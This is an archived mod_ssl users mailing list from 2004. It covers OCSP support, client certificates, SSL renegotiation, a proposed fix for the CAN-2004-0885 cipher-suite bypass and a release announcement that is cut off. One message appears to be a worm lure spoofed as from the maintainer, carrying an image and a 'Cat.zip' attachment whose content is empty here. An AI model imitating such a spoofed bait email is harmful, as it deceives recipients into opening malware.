Received: by master.modssl.org (Postfix, from userid 4003)
	id F3F80A8A49; Fri, 24 Sep 2004 09:13:50 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from amer-mta01.csc.com (amer-mta01.csc.com [20.137.2.247])
	by master.modssl.org (Postfix) with ESMTP id 4496AA8976
	for ; Fri, 24 Sep 2004 09:13:45 +0200 (CEST)
Received: from csc.com (va-fch34.csc.com [20.6.39.227])
	by amer-mta01.csc.com (Switch-3.1.6/Switch-3.1.0) with ESMTP id i8O7DaOT009025
	for ; Fri, 24 Sep 2004 03:13:41 -0400 (EDT)
To: 
Subject: OCSP support added
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 6.5.1 January 21, 2004
From: Marc Stern 
Message-ID: 
Date: Fri, 24 Sep 2004 09:12:36 +0200
X-MIMETrack: Serialize by Router on VA-FCH34/SRV/CSC(Release 6.0.3|September 26, 2003) at
 09/24/2004 03:28:23 AM,
	Serialize complete at 09/24/2004 03:28:23 AM
Content-Type: multipart/alternative; boundary="=_alternative 0028007DC1256F19_="
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Marc Stern 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multipart message in MIME format.
--=_alternative 0028007DC1256F19_=
Content-Type: text/plain; charset="US-ASCII"

Fyi, I added support for certificate validation through OCSP, where the 
OCSP server URI is contained in the certificate itself (following the 
X.509 standard).
The patch is available on 
http://issues.apache.org/bugzilla/show_bug.cgi?id=31383 (for 2.0.49, but 
most of it is in separate files, thus it should be easy to add to 1.3).

The check is optional.
There is also a parameter to decide if the authentication fails or not 
when the server cannot be reached.

The code allows conditional compilation (full code enclosed in #ifdef).

This was developed for the Belgium Government and distributed publicly 
from January 2004. No bug has been reported since.

The code supports a proxy, although the option was not added in the config 
file.
Another option in the config file could be to use a specified URI in case 
it is not present in the certificate.

If you have any remarks about it, just send me an e-mail.

Marc Stern 
CSC Computer Sciences Corporation Belgium
Security Solutions Group Manager / Network and System Architect
mobile: +32 (0)475 68 29 10    -    Phone: +32 (0)2 714 74 91
e-mail: mstern@csc.com    -    fax: +32 (0)2 714 71 01 
Hippokrateslaan,14   -   B-1932 Sint-Stevens-Woluwe   -  Belgium 


----------------------------------------------------------------------------------------
This is a PRIVATE message. If you are not the intended recipient, please 
delete without copying and kindly advise us by e-mail of the mistake in 
delivery. NOTE: Regardless of content, this e-mail shall not operate to 
bind CSC to any order or other contract unless pursuant to explicit 
written agreement or government initiative expressly permitting the use of 
e-mail for such purpose.
----------------------------------------------------------------------------------------

--=_alternative 0028007DC1256F19_=
Content-Type: text/html; charset="US-ASCII"



Fyi, I added support for certificate
validation through OCSP, where the OCSP server URI is contained in the
certificate itself (following the X.509 standard).

The patch is available on http://issues.apache.org/bugzilla/show_bug.cgi?id=31383
(for 2.0.49, but most of it is in separate files, thus it should be easy
to add to 1.3).



The check is optional.

There is also a parameter to decide
if the authentication fails or not when the server cannot be reached.



The code allows conditional compilation
(full code enclosed in #ifdef).



This was developed for the Belgium Government
and distributed publicly from January 2004. No bug has been reported since.



The code supports a proxy, although
the option was not added in the config file.

Another option in the config file could
be to use a specified URI in case it is not present in the certificate.



If you have any remarks about it, just
send me an e-mail.



Marc Stern 

CSC Computer
Sciences Corporation Belgium

Security Solutions Group Manager / Network and System Architect

mobile: +32 (0)475 68 29 10    -    Phone: +32 (0)2
714 74 91

e-mail: mstern@csc.com    -    fax: +32 (0)2 714 71
01 

Hippokrateslaan,14   -   B-1932 Sint-Stevens-Woluwe   -
 Belgium 





----------------------------------------------------------------------------------------

This is a PRIVATE message. If you are not the intended recipient, please
delete without copying and kindly advise us by e-mail of the mistake in
delivery. NOTE: Regardless of content, this e-mail shall not operate to
bind CSC to any order or other contract unless pursuant to explicit written
agreement or government initiative expressly permitting the use of e-mail
for such purpose.

----------------------------------------------------------------------------------------


--=_alternative 0028007DC1256F19_=--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 24 09:30:31 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E1E58A8A49; Fri, 24 Sep 2004 09:30:30 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mailprimary.werum.de (mailprimary.werum.de [62.156.157.73])
	by master.modssl.org (Postfix) with ESMTP id 2A6F4A8976
	for ; Fri, 24 Sep 2004 09:30:25 +0200 (CEST)
Received: from piranhamail2.werum.net (piranhamail2.werum.net [172.20.0.102])
	by mailprimary.werum.de (Postfix) with ESMTP id 921F2F953F
	for ; Fri, 24 Sep 2004 09:30:10 +0200 (CEST)
Received: from piranhamail2.werum.net (piranhamail2.werum.net [172.20.0.102])
	by piranhamail2.werum.net (8.12.8/8.12.8) with ESMTP id i8O7YFtE013031
	for ; Fri, 24 Sep 2004 09:34:15 +0200
Message-ID: <4153CD32.2090105@werum.de>
Date: Fri, 24 Sep 2004 09:30:58 +0200
From: Eckard Wille 
User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.7.3) Gecko/20040910 MultiZilla/1.6.2.0c
X-Accept-Language: de, en-US
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Private Tunnel/Key With Apache and IE?
References: 
In-Reply-To: 
X-Enigmail-Version: 0.86.0.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-AntiVirus: checked by AntiVir MailGate (version: 2.0.1.11; AVE: 6.27.0.12; VDF: 6.27.0.71; host: piranhamail2.werum.net)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eckard Wille 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

David T. Ashley wrote:

> Hi,
> 
> Is there a way to load Apache and Internet Explorer with keys so that a
> "private tunnel" is created automatically?
> 
> What I'm looking for is an arrangement where only a user who has keys that
> I've given him can use a browser to connect to my server on Port 443.
> 
> (I'm aware of STUNNEL and similar solutions, but I'm looking for a solution
> where only the browser and the server are involved.)

You are looking for client cert authentification, take another look at 
the good docs at

> http://www.modssl.org/docs/2.8/ssl_howto.html#ToC6

Generate your own CA and user certs, import them into IE by using the 
pkcs12 cert format. Google for ssl.ca-0.1 from Yeak Nai Siew, these 
scripts will take you through all neccessary steps. Finally configure 
apache and you're done.

Greets from Germany,
Eckard
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 27 09:33:06 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BA2C2A8A49; Mon, 27 Sep 2004 09:33:06 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from c-blougouras.net (ATuileries-117-1-23-254.w193-251.abo.wanadoo.fr [193.251.49.254])
	by master.modssl.org (Postfix) with SMTP id B069DA8941
	for ; Mon, 27 Sep 2004 09:33:01 +0200 (CEST)
Date: Mon, 27 Sep 2004 09:31:53 +0100
To: "Modssl-users" 
From: "Rse" 
Subject: Re:
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------keuoungpjlqnpvsgvowa"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------keuoungpjlqnpvsgvowa
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


>fotoinfo





 :)





----------keuoungpjlqnpvsgvowa
Content-Type: image/bmp; name="twfmarkcdf.bmp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="twfmarkcdf.bmp"
Content-ID: 

Qk2mCAAAAAAAADYAAAAoAAAAOwAAABIAAAABABAAAAAAAHAIAAAAAAAAAAAAAAAAAAAAAAAA
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//fwAA/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9//3//f/9//3//f/9/KgMqAyoD
KgMqAyoDKgMqAyoDKgMqAyoDKgMqAyoDKgMqAyoDKgMqAyoDKgMqAyoDKgMqAyoDKgMqAyoD
KgMqAyoDKgMqA/9//3//f/9//3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fwAA/3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9/KgMqA/9//3/+d7ZHKgNwJ7lb/3//f/9/uFMqAyoD
uFP/f/9//3+4UyoDKgO4U/9//3/+d7ZHKgNwJ7lb/3//f/9//3//f/9//3//f/9//3//f/9/
/3//fwAA/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/KgMqA/9//3+UPyoD/nfbYyoD
uFP/f7hTKgPbY9xvKgO4U/9/uFMqA9tj3G8qA7hT/3+2RyoD/nfbYyoDuVv/f/9//3//f/9/
/3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/KgMqA/9/
/3//f/9//3//fyoDcCf/fyoDKgP/f/9/KgMqA/9/KgMqA/9//38qAyoD/3//f/9//3//fyoD
cCf/f/9//3//f/9//3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9/KgMqA/9//3//f/9//3//fyoDKgP/f3AnKgP/f/9/KgMqA/9/cCcqA/9//38qAyoD
/3//f/9//3//fyoDKgP/f/9//3//f/9//3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9/KgMqA/9//3//f/9//3//fyoDcCf/f7lbKgPcb9trKgO5W/9/
uVsqA9xv22sqA7lb/3//f/9//3/bYyoDt0//f/9//3//f/9//3//f/9//3//f/9//3//fwAA
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/KgMqA/9//3+2RyoD/nfbYyoDuFP/f/9/
kjcqAyoDKgP+e/9//3+SNyoDKgMqA/57/3//f/9/kjcqA5I3/3//f/9//3//f/9//3//f/9/
/3//f/9//3//fwAA/3//f/9//3//f/9//3//f/9//3//f/9//3+2R/9/KgMqA/9//3+2RyoD
cCcqA7ZH/3//f7dPKgP9c/1zKgO4U/9/t08qA/1z/XMqA7hT/3//f/9//3/aXyoDt0//f/9/
/3//f/9//3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9//3//f/9//3//f/9//38qA5Q/
KgMqA/9//3/aXyoD22v/f/9//3//fyoDKgP/f/9/KgMqA/9/KgMqA/9//38qAyoD/3//f/9/
/3//fyoDKgP/f/9//3//f/9//3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9//3//f/9/
/3//f/9//3/+d7ZHKgMqA/9//3/cbyoDt0//f/9//3//f7ZHKgP9c/1zKgO2R/9/tkcqA/1z
/XMqA7ZH/3+3TyoD/nf9cyoDtkf/f/9//3//f/9//3//f/9//3//f/9//3//fwAA/3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9/t08qA/9//3/+eyoDKgMqAyoDKgP/f/53t08qAyoD
t0/+e/9//ne3TyoDKgO3T/57/3/+d7dPKgMqA7dP/3//f/9//3//f/9//3//f/9//3//f/9/
/3//fwAA/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fwAA


----------keuoungpjlqnpvsgvowa
Content-Type: application/octet-stream; name="Cat.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Cat.zip"



----------keuoungpjlqnpvsgvowa--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct  7 20:32:39 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 55015A8A57; Thu,  7 Oct 2004 20:32:39 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from server1050.gisol.com (server1050.gisol.com [216.240.136.125])
	by master.modssl.org (Postfix) with ESMTP id A6E4DA8A49
	for ; Thu,  7 Oct 2004 20:32:33 +0200 (CEST)
Received: from [200.11.242.49] (helo=[192.168.0.242])
	by server1050.gisol.com with esmtpa (Exim 4.42)
	id 1CFd2I-0005xt-D9
	for modssl-users@modssl.org; Thu, 07 Oct 2004 11:30:42 -0700
Subject: Will Post-SSL-Renegotiation be coded for Apache 2.x?
From: Adolfo Bello 
To: modssl-users@modssl.org
Content-Type: text/plain
Message-Id: <1097173938.5202.36.camel@localhost>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.4.6-1mdk 
Date: Thu, 07 Oct 2004 14:32:18 -0400
Content-Transfer-Encoding: 7bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - server1050.gisol.com
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [0 0] / [47 12]
X-AntiAbuse: Sender Address Domain - bisapi.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Adolfo Bello 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi list:

I don't know if this is the right list to place this question.

I've been eagerly awaiting the solution of the certificate renegotiation
with post problem for Apache2. However, I just took a look at Apache 2.1
code and found the same comment in ssl_engine_io.c regarding the
problem: this has not been re-implemented for Apache 2.

Will the solution be developed? If so, is there any time frame for this
re-implementation to be released?

Tanks in advance and sorry if this is not a question for this list.

Adolfo

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct  8 09:16:00 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DC785A8976; Fri,  8 Oct 2004 09:16:00 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id 2CEEAA8961
	for ; Fri,  8 Oct 2004 09:15:54 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.12.11/8.12.10) with ESMTP id i987Fju0005327
	for ; Fri, 8 Oct 2004 03:15:45 -0400
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by int-mx1.corp.redhat.com (8.11.6/8.11.6) with ESMTP id i987Fdr22532
	for ; Fri, 8 Oct 2004 03:15:40 -0400
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.12.10/8.12.7) with ESMTP id i987FcNE008136
	for ; Fri, 8 Oct 2004 08:15:38 +0100
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.12.10/8.12.10/Submit) id i987Fc40008135
	for modssl-users@modssl.org; Fri, 8 Oct 2004 08:15:38 +0100
Date: Fri, 8 Oct 2004 08:15:38 +0100
From: Joe Orton 
To: modssl-users@modssl.org
Subject: Re: Will Post-SSL-Renegotiation be coded for Apache 2.x?
Message-ID: <20041008071538.GA8076@redhat.com>
Mail-Followup-To: modssl-users@modssl.org
References: <1097173938.5202.36.camel@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: <1097173938.5202.36.camel@localhost>
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, Oct 07, 2004 at 02:32:18PM -0400, Adolfo Bello wrote:
> Hi list:
> 
> I don't know if this is the right list to place this question.
> 
> I've been eagerly awaiting the solution of the certificate renegotiation
> with post problem for Apache2. However, I just took a look at Apache 2.1
> code and found the same comment in ssl_engine_io.c regarding the
> problem: this has not been re-implemented for Apache 2.
> 
> Will the solution be developed? If so, is there any time frame for this
> re-implementation to be released?

It looks like it'll have to be done in 2.0 like it is in 1.3, which is
unfortunate.  If you add yourself to the CC field of the bug below,
you'll find out when someone gets a round tuit.

http://nagoya.apache.org/bugzilla/show_bug.cgi?id=12355

It's a surprisingly difficult problem: it would really be best to solve
at the OpenSSL layer.

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct  8 16:44:26 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 14645A8974; Fri,  8 Oct 2004 16:44:26 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from server1050.gisol.com (server1050.gisol.com [216.240.136.125])
	by master.modssl.org (Postfix) with ESMTP id 74ABFA893B
	for ; Fri,  8 Oct 2004 16:44:20 +0200 (CEST)
Received: from [200.11.242.49] (helo=[192.168.0.238])
	by server1050.gisol.com with esmtpa (Exim 4.43)
	id 1CFvyc-0003k6-VE
	for modssl-users@modssl.org; Fri, 08 Oct 2004 07:44:11 -0700
Subject: Re: Will Post-SSL-Renegotiation be coded for Apache 2.x?
From: Adolfo Bello 
To: modssl-users@modssl.org
In-Reply-To: <20041008071538.GA8076@redhat.com>
References: <1097173938.5202.36.camel@localhost>
	 <20041008071538.GA8076@redhat.com>
Content-Type: text/plain
Message-Id: <1097246644.5217.112.camel@localhost>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.4.6-1mdk 
Date: Fri, 08 Oct 2004 10:44:04 -0400
Content-Transfer-Encoding: 7bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - server1050.gisol.com
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [0 0] / [47 12]
X-AntiAbuse: Sender Address Domain - bisapi.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Adolfo Bello 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, 2004-10-08 at 03:15, Joe Orton wrote:
> On Thu, Oct 07, 2004 at 02:32:18PM -0400, Adolfo Bello wrote:
> > Hi list:
> > 
> > I don't know if this is the right list to place this question.
> > 
> > I've been eagerly awaiting the solution of the certificate renegotiation
> > with post problem for Apache2. However, I just took a look at Apache 2.1
> > code and found the same comment in ssl_engine_io.c regarding the
> > problem: this has not been re-implemented for Apache 2.
> > 
> > Will the solution be developed? If so, is there any time frame for this
> > re-implementation to be released?
> 
> It looks like it'll have to be done in 2.0 like it is in 1.3, which is
> unfortunate.  If you add yourself to the CC field of the bug below,
> you'll find out when someone gets a round tuit.
> 
> http://nagoya.apache.org/bugzilla/show_bug.cgi?id=12355
> 
> It's a surprisingly difficult problem: it would really be best to solve
> at the OpenSSL layer.
> 
> joe

Joe:

Thanks a lot. And good luck.

Regards,

Adolfo

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct  8 17:25:31 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C7498A8A75; Fri,  8 Oct 2004 17:25:31 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id 313DEA8976
	for ; Fri,  8 Oct 2004 17:25:26 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.12.11/8.12.10) with ESMTP id i98FPHvi009364
	for ; Fri, 8 Oct 2004 11:25:17 -0400
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by int-mx1.corp.redhat.com (8.11.6/8.11.6) with ESMTP id i98FPBr28896
	for ; Fri, 8 Oct 2004 11:25:11 -0400
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.12.10/8.12.7) with ESMTP id i98FPANE027723
	for ; Fri, 8 Oct 2004 16:25:10 +0100
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.12.10/8.12.10/Submit) id i98FPAPl027722
	for modssl-users@modssl.org; Fri, 8 Oct 2004 16:25:10 +0100
Date: Fri, 8 Oct 2004 16:25:10 +0100
From: Joe Orton 
To: modssl-users@modssl.org
Subject: [PATCH] proposed fix for CAN-2004-0885
Message-ID: <20041008152510.GE8385@redhat.com>
Mail-Followup-To: modssl-users@modssl.org
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Ralf, here's the fix I suggest for the CAN-2004-0885 SSLCipherSuite
bypass issue (http://issues.apache.org/bugzilla/show_bug.cgi?id=31505):
does it look OK?

I've tested this on a server running OpenSSL 0.9.6 from a custom-hacked
client which resumes the session during the renegotiation for a
per-dir-SSLCipherSuite, and it gets a 403 as expected.  I've tested the
equivalent patch for 2.0 against 0.9.7 and it renegotiates the cipher
suite properly as expected.

--- mod_ssl-2.8.12-1.3.27/pkg.sslmod/ssl_engine_init.c.can0885	2002-10-04 14:17:33.000000000 +0100
+++ mod_ssl-2.8.12-1.3.27/pkg.sslmod/ssl_engine_init.c	2004-10-08 13:35:15.000000000 +0100
@@ -602,6 +602,14 @@
     else
         SSL_CTX_set_session_cache_mode(ctx, SSL_SESS_CACHE_SERVER);
 
+#ifdef SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION
+    /* 
+     * Disallow a session from being resumed during a renegotiation,
+     * so that an acceptable cipher suite can be negotiated.
+     */
+    SSL_CTX_set_options(ctx, SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION);
+#endif
+
     /*
      *  Configure callbacks for SSL context
      */
--- mod_ssl-2.8.12-1.3.27/pkg.sslmod/ssl_engine_kernel.c.can0885	2004-10-08 13:35:15.000000000 +0100
+++ mod_ssl-2.8.12-1.3.27/pkg.sslmod/ssl_engine_kernel.c	2004-10-08 13:35:41.000000000 +0100
@@ -665,7 +665,7 @@
     X509_STORE_CTX certstorectx;
     int depth;
     STACK_OF(SSL_CIPHER) *skCipherOld;
-    STACK_OF(SSL_CIPHER) *skCipher;
+    STACK_OF(SSL_CIPHER) *skCipher = NULL;
     SSL_CIPHER *pCipher;
     ap_ctx *apctx;
     int nVerifyOld;
@@ -1051,6 +1051,20 @@
                 return FORBIDDEN;
             }
         }
+        
+        /*
+         * Also check that SSLCipherSuite has been enforced as expected.
+         */
+        if (skCipher) {
+            pCipher = SSL_get_current_cipher(ssl);
+            if (sk_SSL_CIPHER_find(skCipher, pCipher) < 0) {
+                ssl_log(r->server, SSL_LOG_ERROR,
+                        "SSL cipher suite not renegotiated: "
+                        "access to %s denied using cipher %s",
+                        r->filename, SSL_CIPHER_get_name(pCipher));
+                return FORBIDDEN;
+            }
+        }
     }
 
     /*
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 13 23:02:51 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C378FA8A4B; Wed, 13 Oct 2004 23:02:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.belent.com (mail.belent.com [207.96.133.20])
	by master.modssl.org (Postfix) with ESMTP id 0C514A8974
	for ; Wed, 13 Oct 2004 23:02:50 +0200 (CEST)
Received: from [192.168.1.114] (gabriel.office [192.168.1.114])
	by mail.belent.com (8.12.11/8.12.4) with ESMTP id i9DL2h0D030019
	for ; Wed, 13 Oct 2004 17:02:43 -0400
Message-ID: <416D9814.4070404@belent.com>
Date: Wed, 13 Oct 2004 17:03:16 -0400
From: Gabriel Tataranu 
User-Agent: Mozilla Thunderbird 0.7.1 (X11/20040626)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: mod_ssl and EVP interface
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Gabriel Tataranu 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

is it possible to use ciphers trough EVP interface ? In openssl it's 
easy to do using '-evp' option. I haven't seen any option in mod_ssl 
related to this. Thanks,

Gabriel
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 15 15:40:16 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1FF41A8D14; Fri, 15 Oct 2004 15:40:16 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp.engelschall.com (visp.engelschall.com [195.27.176.148])
	by master.modssl.org (Postfix) with ESMTP id 9269EA895E;
	Fri, 15 Oct 2004 15:40:15 +0200 (CEST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 7B8364CE7F0; Fri, 15 Oct 2004 15:40:15 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 00E9AA182C; Fri, 15 Oct 2004 15:39:39 +0200 (CEST)
Date: Fri, 15 Oct 2004 15:39:39 +0200
From: "Ralf S. Engelschall" 
To: modssl-announce@modssl.org, modssl-users@modssl.org
Subject: [ANNOUNCE] mod_ssl 2.8.20-1.3.31
Message-ID: <20041015133939.GA47979@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4.2.1i
Organization: Engelschall, Germany.
X-Web-Homepage: http://www.engelschall.com/
X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc
X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Prompted by a security issue (see below), mod_ssl 2.8.20 for Apache
1.3.31 was released today. You can get it at the usual location:

o http://www.modssl.org/source/
o  ftp://ftp.modssl.org/source/

Yours,
                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

  Changes with mod_ssl 2.8.20 (16-Jul-2004 to 15-Oct-2004)

   *) With OpenSSL 0.9.7, prevent session resumption during a
      renegotiation to force the client to negotiate a new (and
      acceptable to mod_ssl) cipher suite. Additionally, ensure
